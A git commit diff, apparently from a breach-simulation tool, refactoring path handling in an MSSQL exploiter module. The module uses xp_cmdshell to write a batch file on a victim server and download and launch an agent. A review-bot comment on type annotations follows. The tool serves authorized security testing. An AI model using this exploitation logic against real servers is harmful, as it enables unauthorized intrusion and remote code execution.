Agent: Use PureWindowsPath in MSSQLExploiter

When using PurePath, Linux agents use the wrong path separator to build
Windows paths. Windows corrects this, so there's no actual issue, but
it's sloppy. Using PureWindowsPath objects builds the paths with the
correct separators.

Before: xp_cmdshell "NUL>%temp%\tmp_monkey_dir/tmp_monkey.bat"
After: xp_cmdshell "NUL>%temp%\tmp_monkey_dir\tmp_monkey.bat"
Mike Salvatore 2022-06-14 11:32:54 -04:00
parent ef63f2699b
commit ea980c4594
1 changed files with 10 additions and 13 deletions


@ -1,6 +1,5 @@
import logging import logging
import os from pathlib import PureWindowsPath
from pathlib import PurePath
from time import sleep from time import sleep
import pymssql import pymssql
@ -31,7 +30,7 @@ class MSSQLExploiter(HostExploiter):
# Temporary file that saves commands for monkey's download and execution. # Temporary file that saves commands for monkey's download and execution.
TMP_FILE_NAME = "tmp_monkey.bat" TMP_FILE_NAME = "tmp_monkey.bat"
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir" TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
MAX_XP_CMDSHELL_COMMAND_SIZE = 12800 MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
@ -49,9 +48,7 @@ class MSSQLExploiter(HostExploiter):
super().__init__() super().__init__()
self.cursor = None self.cursor = None
self.agent_http_path = None self.agent_http_path = None
self.payload_file_path = os.path.join( self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
)
def _exploit_host(self) -> ExploiterResultData: def _exploit_host(self) -> ExploiterResultData:
""" """
@ -109,7 +106,7 @@ class MSSQLExploiter(HostExploiter):
return self.exploit_result return self.exploit_result
def run_payload_file(self): def run_payload_file(self):
file_running_command = MSSQLLimitedSizePayload(self.payload_file_path) file_running_command = MSSQLLimitedSizePayload(str(self.payload_file_path))
return self.run_mssql_command(file_running_command) return self.run_mssql_command(file_running_command)
def create_temp_dir(self): def create_temp_dir(self):
@ -133,7 +130,7 @@ class MSSQLExploiter(HostExploiter):
raise Exception("Couldn't execute MSSQL exploiter because payload was too long") raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
self.run_mssql_commands(array_of_commands) self.run_mssql_commands(array_of_commands)
def run_monkey(self, monkey_path_on_victim: PurePath): def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
logger.debug( logger.debug(
f"Launching the agent: {monkey_launch_command.prefix} -- " f"Launching the agent: {monkey_launch_command.prefix} -- "
@ -148,7 +145,7 @@ class MSSQLExploiter(HostExploiter):
self.cursor.execute(cmd) self.cursor.execute(cmd)
sleep(MSSQLExploiter.QUERY_BUFFER) sleep(MSSQLExploiter.QUERY_BUFFER)
def upload_monkey(self, monkey_path_on_victim: PurePath): def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim) monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
self.run_payload_file() self.run_payload_file()
self.add_executed_cmd(monkey_download_command.command) self.add_executed_cmd(monkey_download_command.command)
@ -164,7 +161,7 @@ class MSSQLExploiter(HostExploiter):
) )
self.run_mssql_command(tmp_dir_removal_command) self.run_mssql_command(tmp_dir_removal_command)
def start_monkey_server(self, monkey_path_on_victim: PurePath) -> LockedHTTPServer: def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(monkey_path_on_victim), self.agent_repository self.host, str(monkey_path_on_victim), self.agent_repository
) )
@ -175,12 +172,12 @@ class MSSQLExploiter(HostExploiter):
http_thread.stop() http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT) http_thread.join(LONG_REQUEST_TIMEOUT)
def write_download_command_to_payload(self, monkey_path_on_victim: PurePath): def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim) monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
self.run_mssql_command(monkey_download_command) self.run_mssql_command(monkey_download_command)
return monkey_download_command return monkey_download_command
def get_monkey_launch_command(self, monkey_path_on_victim: PurePath): def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
# Form monkey's launch command # Form monkey's launch command
monkey_args = build_monkey_commandline( monkey_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim self.host, self.current_depth - 1, monkey_path_on_victim
@ -193,7 +190,7 @@ class MSSQLExploiter(HostExploiter):
suffix=suffix, suffix=suffix,
) )
def get_monkey_download_command(self, monkey_path_on_victim: PurePath): def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim) http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
) )
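Review bot: The switch of the `monkey_path_on_victim` annotations from PurePath to PureWindowsPath (run_monkey, upload_monkey, start_monkey_server, write_download_command_to_payload, get_monkey_launch_command, get_monkey_download_command) does not by itself fix the separator problem the commit describes, because annotations are not enforced at runtime and the value is only ever used through `str(monkey_path_on_victim)` — once for create_locked_transfer in start_monkey_server and once as `dst_path` in get_monkey_download_command. If the caller, which is outside these hunks, still builds the path on a Linux agent with PurePath (i.e. a PurePosixPath), those two `str()` calls keep emitting forward slashes into the xp_cmdshell command exactly as before. A one-line normalization at the entry points closes that gap regardless of what the caller passes, e.g. `monkey_path_on_victim = PureWindowsPath(monkey_path_on_victim)` as the first statement of upload_monkey and run_monkey, since PureWindowsPath rewrites `/` to `\` on construction. Separately, TMP_DIR_PATH is now a path object rather than a str, so any remaining string concatenation of it in create_temp_dir or in the tmp_dir_removal_command construction (both bodies lie outside these hunks) would now raise TypeError and is worth a check; `str.format` and f-strings still work. The bodies of the annotated methods continue past the hunk boundaries.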